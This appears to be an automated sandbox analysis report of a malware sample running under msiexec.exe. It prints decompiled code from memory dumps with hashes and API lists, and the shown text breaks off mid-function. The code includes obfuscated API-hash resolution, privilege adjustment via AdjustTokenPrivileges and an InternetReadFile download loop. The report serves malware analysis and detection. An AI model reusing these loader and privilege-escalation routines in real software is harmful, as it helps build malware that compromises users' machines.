Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a899f457d16ab12092ff2f54d4c5125315ede7ac8fa77b7099f8bcbd4abdfeb1
Instruction ID: 687fa459e0524e03354557661aa2ac75496ac120389f5a4af949a2057ef895dd
Opcode Fuzzy Hash: a899f457d16ab12092ff2f54d4c5125315ede7ac8fa77b7099f8bcbd4abdfeb1
Instruction Fuzzy Hash: D6417373A405394B9B54CEAD88910EFB3E6AFD8320B168525DC68BB344D634ED1687D1

Uniqueness

Uniqueness Score: -1.00%

Function 6E868830, Relevance: .1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E868830(void* __ecx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _t26;
				intOrPtr* _t28;
				void* _t34;
				void* _t42;
				signed short _t45;
				signed int _t51;
				signed int _t54;
				signed int _t55;
				signed int _t57;
				intOrPtr* _t61;
				intOrPtr* _t62;
				void* _t63;
				signed short _t66;
				void* _t67;
				void* _t68;
				void* _t69;
				void* _t73;
				intOrPtr* _t79;
				intOrPtr _t81;

				_t26 = E6E8600D0(_a8);
				_t68 = _t67 + 4;
				_t76 = _t26;
				_v32 = _t26;
				if(_t26 == 0) {
					L6:
					return 0;
				}
				_t48 = _a4;
				_t28 = E6E869180(_t76, _a4);
				_t69 = _t68 + 4;
				_t61 = _t28;
				if(_t61 != 0) {
					if( *_t61 == 0) {
						goto L6;
					}
					_t62 = _t61 + 0x14;
					_t79 = _t62;
					while(1) {
						_t34 = E6E85ACF0(E6E851460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2, _t79, _a8, E6E851460(_t79,  *((intOrPtr*)(_t62 - 8)) + 0x20e4c70e, _t48) + 0xdf1b38f2);
						_t69 = _t69 + 0x10;
						if(_t34 == 0) {
							break;
						}
						_t81 =  *_t62;
						_t62 = _t62 + 0x14;
						if(_t81 != 0) {
							continue;
						}
						goto L6;
					}
					_t51 =  ~(E6E851460(__eflags, E6E8522E0(__eflags, 0,  *((intOrPtr*)(_t62 - 0x14))),  ~_t48));
					E6E851460(__eflags,  *((intOrPtr*)(_t62 - 0x14)), _a4);
					_t73 = _t69 + 0x18;
					_t66 =  *_t51;
					_v28 = _t51;
					__eflags = _t66;
					if(_t66 == 0) {
						L12:
						return 1;
					}
					_t54 = _a4;
					_t63 = 0;
					_t55 = _t54 + 0xd8be785;
					__eflags = _t55;
					_v24 = _t55;
					_v20 =  *((intOrPtr*)(_t62 - 4)) + _t54;
					while(1) {
						E6E853750(__eflags, _t66, 0xffff);
						_t42 = E6E859D50(0x960018d7);
						__eflags = _t66;
						_t57 = _v24 + _t66;
						_t44 =  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2;
						_t45 = E6E866B30(_t66, _v32,  <  ? _t66 & 0x0000ffff : _t42 + _t57 + 2);
						_t73 = _t73 + 0x14;
						__eflags = _t45;
						_t55 = (_t57 & 0xffffff00 | _t45 != 0x00000000) & _t55;
						__eflags = _t45;
						 *(_v20 + _t63) = _t45;
						if(_t45 == 0) {
							break;
						}
						_t66 =  *(_v28 + _t63 + 4);
						_t63 = _t63 + 4;
						__eflags = _t66;
						if(__eflags != 0) {
							continue;
						}
						goto L12;
					}
					return _t55;
				}
				return 1;
			}

0x6e86883c
0x6e868841
0x6e868844
0x6e868846
0x6e868849
0x6e86889c
0x00000000
0x6e86889c
0x6e86884b
0x6e86884f
0x6e868854
0x6e868857
0x6e86885d
0x6e868862
0x00000000
0x00000000
0x6e868864
0x6e868864
0x6e868870
0x6e868888
0x6e86888d
0x6e868892
0x00000000
0x00000000
0x6e868894
0x6e868897
0x6e86889a
0x00000000
0x00000000
0x00000000
0x6e86889a
0x6e8688c2
0x6e8688c8
0x6e8688cd
0x6e8688d0
0x6e8688d2
0x6e8688d5
0x6e8688d7
0x6e86894a
0x00000000
0x6e86894a
0x6e8688dc
0x6e8688df
0x6e8688e3
0x6e8688e3
0x6e8688e9
0x6e8688ec
0x6e8688f0
0x6e8688f8
0x6e868905
0x6e868910
0x6e868915
0x6e86891c
0x6e868923
0x6e868928
0x6e86892e
0x6e868933
0x6e868935
0x6e868937
0x6e86893a
0x00000000
0x00000000
0x6e86893f
0x6e868943
0x6e868946
0x6e868948
0x00000000
0x00000000
0x00000000
0x6e868948
0x00000000
0x6e868951
0x6e8688a5

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbb1cae3c93fc8ac119ccc2db5715d6eb57a83ae2a4cf24edaf0a63e1cb39176
Instruction ID: 04ff39b152151d24bdd9a895a63f6fb489998710e7308622baddd67057b3a130
Opcode Fuzzy Hash: cbb1cae3c93fc8ac119ccc2db5715d6eb57a83ae2a4cf24edaf0a63e1cb39176
Instruction Fuzzy Hash: 2E31B6B6D001169BEB008EA8EC41ABA7769EF42359F050834E91CBB341EB31DD24C7E2

Uniqueness

Uniqueness Score: -1.00%

Function 6E859C60, Relevance: .1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E859C60(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed char _v17;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _t35;
				signed int _t36;
				signed int _t38;
				signed int _t42;
				signed int _t44;
				signed char _t45;
				signed int _t49;
				signed char _t51;
				signed int _t53;
				signed int _t56;
				signed int _t57;
				signed int _t60;
				signed int _t75;
				signed int _t76;
				signed int _t88;
				signed int _t94;
				signed int _t95;

				_t95 = _a12;
				_t35 = _a4 * 0xffffffa5 * _t95;
				_t53 = _t35 - _t95;
				_t49 = 0;
				if((_t35 >> 0x0000001f ^ _a16 | _t35 ^ _t95) != 0) {
					_t36 = _a4;
					_t75 =  !_t95 & (_t53 | _t35) + _t36;
					_t38 = _t75 * 0x73;
					_t53 = _t75;
					_t76 = _t36;
				} else {
					_t38 = 0;
					_t76 = _a4;
				}
				asm("sbb edx, [ebp+0xc]");
				if(_t95 >= _t76) {
					_t49 = 0x3a1;
				}
				_t56 = _t53;
				_t94 = (_t38 & _t95 ^ _t49) * _t56 * 0x77;
				_t57 = _t56 ^ _t94;
				_t42 = _t49;
				_v24 = _t57;
				_v32 = _t42;
				_t51 = _t57 * _t42;
				_t44 = E6E857DD0(0xc5) * _t51;
				_v17 = _t44;
				_v28 = _t94;
				_t45 = _t44 * _t94;
				_t60 = _a8;
				asm("sbb edx, ecx");
				if(_t51 >= _a4) {
					L8:
					_t88 = (_v24 + _t45 * _a4 - _t45 * _a4 ^ _v28) + _t45 * _a4 ^ _v17;
				} else {
					_t88 = _t60 ^ _a16 | _t95 ^ _a4;
					if(_t88 == 0 || (_t51 >> 0x0000001f ^ _a16 | _t95 ^ _t51) != 0) {
						goto L8;
					}
				}
				 *0x6e872100 = _t88;
				return _v32;
			}

0x6e859c69
0x6e859c73
0x6e859c7c
0x6e859c85
0x6e859c89
0x6e859c94
0x6e859c9f
0x6e859ca4
0x6e859ca7
0x6e859ca9
0x6e859c8b
0x6e859c8b
0x6e859c8d
0x6e859c8d
0x6e859cb0
0x6e859cb3
0x6e859cb5
0x6e859cb5
0x6e859cbe
0x6e859cc4
0x6e859cc7
0x6e859cc9
0x6e859ccb
0x6e859cd0
0x6e859cd3
0x6e859ce3
0x6e859ce5
0x6e859cea
0x6e859ced
0x6e859cfa
0x6e859cfd
0x6e859cff
0x6e859d1e
0x6e859d38
0x6e859d01
0x6e859d0b
0x6e859d0d
0x00000000
0x00000000
0x6e859d0d
0x6e859d3a
0x6e859d4a

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9e2b3da87b1bb6eb400071a7fc355e201c455960ddd1ff85b3c0e90b485ef87
Instruction ID: df6f40746b26f422b29255de22774df70fa120daa177f51cc63bf40c8649589f
Opcode Fuzzy Hash: a9e2b3da87b1bb6eb400071a7fc355e201c455960ddd1ff85b3c0e90b485ef87
Instruction Fuzzy Hash: D531C371B004194B9B0DCE6DC8925BFBBEBABC4211B54C12EE819DB388DD349A168B90

Uniqueness

Uniqueness Score: -1.00%

Function 6E8942DE, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2156782626.000000006E894000.00000040.00020000.sdmp, Offset: 6E894000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction ID: 5efce70f366b6e9c38c9c09f01412a3a517943fd5c2f0cc75a3f8024c4517de5
Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
Instruction Fuzzy Hash: 2911DF737401009FD754CEA9DCD0E96B3AAEBD9230B258466ED14CB315D735E80297A0

Uniqueness

Uniqueness Score: -1.00%

Function 6E8946D7, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2156782626.000000006E894000.00000040.00020000.sdmp, Offset: 6E894000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction ID: 02d5f61fab505bf7ddf4aa55427f513e027dc5efb7a10069b3b3eb59d113df35
Opcode Fuzzy Hash: 2c84f22b3cc78628e4c069225da77c858ff700800577a2065164e0eac194b3da
Instruction Fuzzy Hash: A701F13670420DAFD704CBADD8D4D6ABBE8EBC7720B15C47EC56683616E224E846CA20

Uniqueness

Uniqueness Score: -1.00%

Function 6E86CE40, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E86CE40(short* _a4, intOrPtr _a8) {
				void* _t8;
				short* _t9;
				intOrPtr _t10;
				short* _t11;
				void* _t12;

				_t10 = _a8;
				_t11 = _a4;
				if(_t10 != 0) {
					_t11 = _t11 + 2;
					_t9 = 0;
					while( *((short*)(_t11 - 2)) != 0) {
						L3:
						_t11 = _t11 + 2;
					}
					if( *_t11 == 0) {
						_t11 = 0;
					} else {
						_t8 = E6E859D50(0x1e99166a);
						_t12 = _t12 + 4;
						_t9 = _t9 + _t8 - 0x7aed16c5;
						if(_t9 != _t10) {
							goto L3;
						} else {
						}
					}
				}
				return _t11;
			}

0x6e86ce46
0x6e86ce49
0x6e86ce4e
0x6e86ce50
0x6e86ce53
0x6e86ce5a
0x6e86ce60
0x6e86ce60
0x6e86ce63
0x6e86ce6e
0x6e86ce8a
0x6e86ce70
0x6e86ce75
0x6e86ce7a
0x6e86ce7d
0x6e86ce86
0x00000000
0x00000000
0x6e86ce88
0x6e86ce86
0x6e86ce6e
0x6e86ce92

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c24da39859ccb92acc90950274e1cac54e860e005d0011c873bb6ab86854ba77
Instruction ID: f2ee35e507f79d730f9db697253cee3ef9860d944ad7027feaca9933044ddcaa
Opcode Fuzzy Hash: c24da39859ccb92acc90950274e1cac54e860e005d0011c873bb6ab86854ba77
Instruction Fuzzy Hash: 05F05C62F5162886EB616ED6D881C97F3B8EB42654F058829DC185B2C2F3B1A8C8C2D0

Uniqueness

Uniqueness Score: -1.00%

Function 6E862EF0, Relevance: .0, Instructions: 2
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E862EF0() {

				return  *[fs:0x30];
			}

0x6e862ef6

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E8546E0, Relevance: 6.1, APIs: 4, Instructions: 134
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8546E0(void* __eax, struct _LUID* _a4, struct HDC__* _a8, long _a12) {
				signed int _v20;
				signed int _t33;
				int _t34;
				signed int _t45;
				struct tagRECT* _t46;
				signed char _t47;
				signed int _t48;
				WCHAR* _t49;
				struct HWND__* _t50;
				signed char _t51;
				signed char _t55;
				signed int _t57;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				struct _LUID* _t63;
				signed int _t64;
				signed int _t71;
				int _t73;
				signed int _t75;
				signed int _t81;
				signed int _t82;
				struct HDC__* _t83;
				signed int _t84;

				_t73 = _a12;
				_t83 = _a8;
				_t45 = _t83 * 0x59;
				_t46 = _t45 ^ 0x000000fa;
				_t47 = _t46 & (_t45 ^ 0x00000023);
				OffsetRect(_t46, _t73, _t73);
				_t55 = _t47 + 0xbd;
				_t57 = (_t55 ^ _t47) + _t47;
				_t48 = _t55;
				_v20 = _t57;
				_t58 = _t57;
				_t75 = (_t58 + _t83) * _t48;
				if(_t83 != _t73 || _t58 >= _a8) {
					_t84 = _t75;
					_t49 = _t48 + _t84;
					_t83 = _t84 + _t49;
					LookupPrivilegeValueW(_t49, _t83, _a4);
					_t59 = _t83 + _t49;
					_t75 = _t59 | _t49;
					_t33 = _t49;
					_t48 = _t83;
					if(_a4 == 0xd9f29025) {
						goto L3;
					}
				} else {
					_t59 = _v20;
					if(_a4 != 0xd9f29025) {
						L7:
						_v20 = _t59;
						if(_t59 != _a12) {
							L11:
							_t34 = _a4;
							_t50 = _t48 + _t34;
							EndDialog(_t50, _t34);
							_t81 = ((_t75 ^ _t50) << 0x10) + 0x3080000 >> 0x10;
							_t62 = _t81 * _t50;
							_t83 = (_t83 * _t62 << 0x10) + 0x2520000 >> 0x10;
							_t33 = _t50;
							_t48 = _t81;
							L12:
							if(_a8 == _a12) {
								_t82 = _t62;
								_t63 = _a4;
								if(_t63 != _a8 && _t33 != _t63) {
									SetTextColor(_t83, _a12);
									_t48 = _t82 & (_t83 - _a8 ^ _t48 ^ 0x000003be | 0x00001000);
								}
							}
							return _t48;
						}
						_t64 = _t75;
						if(_t64 != _a12 || _t64 == _a4) {
							goto L11;
						} else {
							_t62 = _v20;
							goto L12;
						}
					}
					L3:
					if(_a8 != 0xd9f29025) {
						_t71 = _t59;
						if(_t71 == _a8) {
							_t59 = _t71;
						} else {
							_t33 = (_t75 << 0x10) + 0x1c0000 >> 0x10;
							_t51 = _t48 + _t33;
							_t83 = (_t51 << 0x18) + 0x6b000000 >> 0x18;
							_t59 = _t51 * _t83;
							_t48 = _t59 * 0x6c000000 >> 0x18;
						}
					}
				}
			}

0x6e8546e7
0x6e8546ea
0x6e8546ed
0x6e8546f4
0x6e8546fa
0x6e8546ff
0x6e854709
0x6e854711
0x6e854713
0x6e854715
0x6e854718
0x6e854720
0x6e854725
0x6e854781
0x6e854784
0x6e854786
0x6e854791
0x6e85479a
0x6e85479f
0x6e8547a1
0x6e8547a3
0x6e8547ab
0x00000000
0x00000000
0x6e85472c
0x6e854731
0x6e85473a
0x6e8547ad
0x6e8547ad
0x6e8547b6
0x6e8547ca
0x6e8547ca
0x6e8547cd
0x6e8547d1
0x6e8547e2
0x6e8547e7
0x6e8547f9
0x6e8547fc
0x6e8547fe
0x6e854800
0x6e854806
0x6e854808
0x6e85480a
0x6e854810
0x6e85481d
0x6e854838
0x6e854838
0x6e854810
0x6e854844
0x6e854844
0x6e8547b8
0x6e8547be
0x00000000
0x6e8547c5
0x6e8547c5
0x00000000
0x6e8547c5
0x6e8547be
0x6e85473c
0x6e854743
0x6e854745
0x6e85474d
0x6e854845
0x6e854753
0x6e85475d
0x6e854760
0x6e85476d
0x6e854773
0x6e85477c
0x6e85477c
0x6e85474d
0x6e854743

APIs

OffsetRect.USER32 ref: 6E8546FF
LookupPrivilegeValueW.ADVAPI32(00000000,-6E871D33,?), ref: 6E854791
EndDialog.USER32 ref: 6E8547D1
SetTextColor.GDI32(-70D91D33,-725D1D33), ref: 6E85481D

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorDialogLookupOffsetPrivilegeRectTextValue
String ID:
API String ID: 2289036324-0
Opcode ID: 194c2b3b4408317b3fc7d9a3d52c3f2f8aa1968796bc489e964eccf9af44e953
Instruction ID: 1ecf5e6179bd81aa362970775f1c806d76e13690e795ceeb973c0bcfa7c2d407
Opcode Fuzzy Hash: 194c2b3b4408317b3fc7d9a3d52c3f2f8aa1968796bc489e964eccf9af44e953
Instruction Fuzzy Hash: 5C412C33B005285BDB48CE99CCE45BF77AAEBC5361B16452DE81A9B781C530A956C6C0

Uniqueness

Uniqueness Score: -1.00%

Function 6E8529D0, Relevance: 6.1, APIs: 4, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E8529D0(void* __eax, struct HWND__* _a4) {
				int _v20;
				signed int _t14;
				struct HDC__* _t21;
				signed int _t26;
				signed int _t28;
				long _t29;
				void* _t32;
				struct HWND__* _t33;
				signed int _t37;
				signed int _t38;
				struct HDC__* _t40;
				struct HWND__* _t42;
				signed int _t43;
				void* _t44;
				void** _t46;

				_t33 = _a4;
				_t26 = _t33 + (_t33 & 0x00000004);
				_t40 = _t26 * 0x6e;
				DeleteDC(_t40);
				_t14 = _t33 * _t40 * _t26;
				_t42 = _t40 + _t14 ^ 0x00000191;
				if(_t33 == 0x191 || _t42 != _t33) {
					_t2 = (0x00000191 - _t42 & _t33) + 0x383; // 0x514
					SetWindowPos(_t42, _t33, 0x191, _t33, _t33, _t33, 0x191);
					_t14 = (_t2 | 0x00000383) * 0x383;
				}
				_v20 = _t14;
				_t43 = _t42 * _t14;
				_t4 = _t43 + 0x368; // -1854331339
				_t28 = _t4 - _t14;
				_t37 = _t28 ^ _t43;
				_t6 = _t43 + 0x368; // -1854330467
				_t44 = _t37 + _t6;
				ResetEvent(_t44);
				_t29 = _t28 ^ _t44;
				_t38 = _t37 | _t29;
				_t32 = _t38 & _t44;
				_t7 = _t32 + 0x31; // -1854331290
				_t21 = _t7 * _t44;
				_t46 = (_t21 + _t29) * _t38;
				CreateDIBSection(_t21, _t21, _v20, _t46, _t32, _t29);
				return _t46 * _t32;
			}

0x6e8529d7
0x6e8529df
0x6e8529e1
0x6e8529e5
0x6e8529f0
0x6e8529f5
0x6e852a01
0x6e852a17
0x6e852a1f
0x6e852a2b
0x6e852a2b
0x6e852a31
0x6e852a34
0x6e852a37
0x6e852a3d
0x6e852a41
0x6e852a43
0x6e852a43
0x6e852a4b
0x6e852a51
0x6e852a53
0x6e852a57
0x6e852a59
0x6e852a5c
0x6e852a62
0x6e852a6f
0x6e852a81

APIs

DeleteDC.GDI32(-6E86DD33), ref: 6E8529E5
SetWindowPos.USER32(-6E86DD33,6E857BEC,00000191,6E857BEC,6E857BEC,6E857BEC,00000191), ref: 6E852A1F
ResetEvent.KERNEL32(-6E86D663,?,6E857BEC,-6E871FA0,-725D1D33,-6E871D33,?,6E859287,-6E871D33,?,6E8577A1,00000001,?,-6E871D33,?,6E856A74), ref: 6E852A4B
CreateDIBSection.GDI32(-6E86D99A,-6E86D99A,-6E86D9CB,-6E86D663,-6E86D9CB,-6E86D9CB), ref: 6E852A6F

Memory Dump Source

Source File: 00000004.00000002.2156706145.000000006E851000.00000020.00020000.sdmp, Offset: 6E850000, based on PE: true

Associated: 00000004.00000002.2156700266.000000006E850000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156723267.000000006E870000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2156729505.000000006E872000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2156741521.000000006E875000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDeleteEventResetSectionWindow
String ID:
API String ID: 201249963-0
Opcode ID: a695b9cfd994c035c95db8f60cfd34a97ecb840f9d317e16daf1f6d5967d1b90
Instruction ID: 32b1c25e1dca0aaf57d44fe52a1a8aebf50ef77e0ffc971c6a9be707c6d1bcf4
Opcode Fuzzy Hash: a695b9cfd994c035c95db8f60cfd34a97ecb840f9d317e16daf1f6d5967d1b90
Instruction Fuzzy Hash: 49110873B006247FDB248A5ACC49EDFBA5EE7C9710B060126F849DB240E971AB05C6E0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: msiexec.exe PID: 2504 Parent PID: 2344 msiexec.exeCOMMON

Executed Functions

Function 000F9C90, Relevance: 1.6, APIs: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E000F9C90(void* __eflags, intOrPtr _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v36;
				intOrPtr* _t14;
				intOrPtr* _t15;
				void* _t16;
				void* _t17;
				intOrPtr* _t21;
				void* _t22;
				intOrPtr* _t23;
				void* _t26;
				int _t29;
				intOrPtr* _t30;
				void* _t31;
				void* _t32;
				intOrPtr* _t34;
				signed char _t36;
				signed int _t37;
				signed int _t38;
				void** _t40;
				void* _t46;
				void* _t48;
				void* _t49;

				_t14 = E000EBF50(__eflags, 9, 0xbe1ef6e);
				_t15 = E000EBF50(__eflags, 0, 0x160d384);
				_t48 = _t46 + 0x10;
				_t16 =  *_t15();
				_t40 =  &_v20;
				_t17 =  *_t14(_t16, 0x20, 0, _t40);
				_t57 = _t17;
				if(_t17 != 0) {
					L2:
					_v36.PrivilegeCount = 1;
					_v24 = (_a8 & 0x000000ff) + (_a8 & 0x000000ff);
					_t21 = E000EBF50(_t58, 9, 0xa2414e7);
					_t49 = _t48 + 8;
					_t22 =  *_t21(0, _a4,  &(_v36.Privileges));
					_t59 = _t22;
					if(_t22 == 0) {
						L5:
						_t38 = 0;
						__eflags = 0;
					} else {
						_t26 = E000E9D50(0x647400a5);
						E000EBF50(_t59, _t26, E000E9D50(0x68f91a9f));
						_t49 = _t49 + 0x10;
						_t29 = AdjustTokenPrivileges(_v20, 0,  &_v36, 0, 0, 0); // executed
						_t60 = _t29;
						if(_t29 == 0) {
							goto L5;
						} else {
							_t30 = E000EBF50(_t60, 0, 0xc702be2);
							_t49 = _t49 + 8;
							_t31 =  *_t30();
							_t61 = _t31;
							_t38 = _t37 & 0xffffff00 | _t31 == 0x00000000;
						}
					}
					_t23 = E000EBF50(_t61, 0, 0xb8e7db5);
					 *_t23(_v20);
				} else {
					_t32 = E000E9D50(0x647400a5);
					_t34 = E000EBF50(_t57, _t32, E000E9D50(0x6b5f7e12));
					_t36 = E000E55C0( *_t34(0xffffffff, 0x20, _t40), 0);
					_t48 = _t48 + 0x18;
					_t58 = _t36 & 0x00000001;
					if((_t36 & 0x00000001) != 0) {
						_t38 = 0;
						__eflags = 0;
					} else {
						goto L2;
					}
				}
				return _t38;
			}

0x000f9ca0
0x000f9cb1
0x000f9cb6
0x000f9cb9
0x000f9cbb
0x000f9cc4
0x000f9cc6
0x000f9cc8
0x000f9d0a
0x000f9d10
0x000f9d1f
0x000f9d29
0x000f9d2e
0x000f9d35
0x000f9d37
0x000f9d39
0x000f9d8e
0x000f9d8e
0x000f9d8e
0x000f9d3b
0x000f9d40
0x000f9d59
0x000f9d5e
0x000f9d70
0x000f9d72
0x000f9d74
0x00000000
0x000f9d76
0x000f9d7d
0x000f9d82
0x000f9d85
0x000f9d87
0x000f9d89
0x000f9d89
0x000f9d74
0x000f9d97
0x000f9da2
0x000f9cca
0x000f9ccf
0x000f9ce8
0x000f9cfa
0x000f9cff
0x000f9d02
0x000f9d04
0x000f9da6
0x000f9da6
0x00000000
0x00000000
0x00000000
0x000f9d04
0x000f9db1

APIs

AdjustTokenPrivileges.KERNELBASE(?,00000000,00000001,00000000,00000000,00000000), ref: 000F9D70

Part of subcall function 000EBF50: LoadLibraryA.KERNEL32(?), ref: 000EC1A1

Memory Dump Source

Source File: 00000005.00000002.2357740801.00000000000E0000.00000040.00000001.sdmp, Offset: 000E0000, based on PE: true

Similarity

API ID: AdjustLibraryLoadPrivilegesToken
String ID:
API String ID: 1509250347-0
Opcode ID: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction ID: 1b77816b1216fd17715ba3d0f170b61efadaecf59edf51938fc0c4deccdb1392
Opcode Fuzzy Hash: 8541315563667a3872a3cbdb93962040045fbbbfbf2c1bd2c438475c9d480750
Instruction Fuzzy Hash: 3421D3A2E403993AEB2036F26C13FBF35589B51719F190030FE18B52C3FA91AE1485B2

Uniqueness

Uniqueness Score: -1.00%

Function 000E1AF0, Relevance: 1.6, APIs: 1, Instructions: 100
filenetworkCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000E1AF0(void* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				long _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _t24;
				void* _t27;
				int _t31;
				signed char _t32;
				intOrPtr* _t33;
				intOrPtr _t38;
				intOrPtr* _t40;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;
				void* _t58;

				_t24 = _a12;
				_t50 = _a16;
				_v24 = 0;
				_t48 =  <=  ? _t24 : 0xa00000;
				_t54 = 0;
				_v32 =  <=  ? _t24 : 0xa00000;
				_t63 = _t50;
				if(_t50 == 0) {
					while(1) {
						L2:
						_t6 = _t54 + 0x40000; // 0x40000
						_v20 = 0x40000;
						_t27 = E000FB220(_t64,  &_v24, _t6); // executed
						_t56 = _t55 + 8;
						_t65 = _t27;
						if(_t27 == 0) {
							break;
						}
						E000EBF50(_t65, 0x13, 0x7e90205);
						_t56 = _t56 + 8;
						_t42 = _v24;
						_t31 = InternetReadFile(_a4, _t42 + _t54, _v20,  &_v20); // executed
						if(_t31 == 0) {
							break;
						}
						_v28 = _t42;
						_t43 = _t50;
						_t51 = _v20;
						_t32 = E000E55C0(_v20, 0);
						_t58 = _t56 + 8;
						_t67 = _t32 & 0x00000001;
						if((_t32 & 0x00000001) != 0) {
							_t33 = _a8;
							__eflags = _t33;
							if(_t33 == 0) {
								E000EB570(_v28);
								return 1;
							}
							 *_t33 = _v28;
							 *((intOrPtr*)(_t33 + 4)) = _t54;
							return 1;
						}
						_t38 = E000E22E0(_t67, _t51 + _t54 + E000E9D50(0x6fb39a5e), 0xbc79af2);
						_t56 = _t58 + 0xc;
						if(_t38 > _v32) {
							break;
						}
						_t54 = _t38;
						_t50 = _t43;
						_t64 = _t50;
						if(_t50 != 0) {
							goto L1;
						}
					}
					L8:
					E000EB570(_v24);
					__eflags = 0;
					return 0;
				}
				L1:
				_t40 = E000EBF50(_t63, 0, E000E9D50(0x640dea48));
				_t56 = _t56 + 0xc;
				_t41 =  *_t40(_t50, 0);
				_t64 = _t41 - 0x102;
				if(_t41 != 0x102) {
					goto L8;
				}
				goto L2;
			}

0x000e1af9
0x000e1afc
0x000e1b04
0x000e1b14
0x000e1b17
0x000e1b19
0x000e1b1c
0x000e1b1e
0x000e1b48
0x000e1b48
0x000e1b48
0x000e1b4e
0x000e1b5a
0x000e1b5f
0x000e1b62
0x000e1b64
0x00000000
0x00000000
0x000e1b6d
0x000e1b72
0x000e1b75
0x000e1b86
0x000e1b8a
0x00000000
0x00000000
0x000e1b8c
0x000e1b8f
0x000e1b91
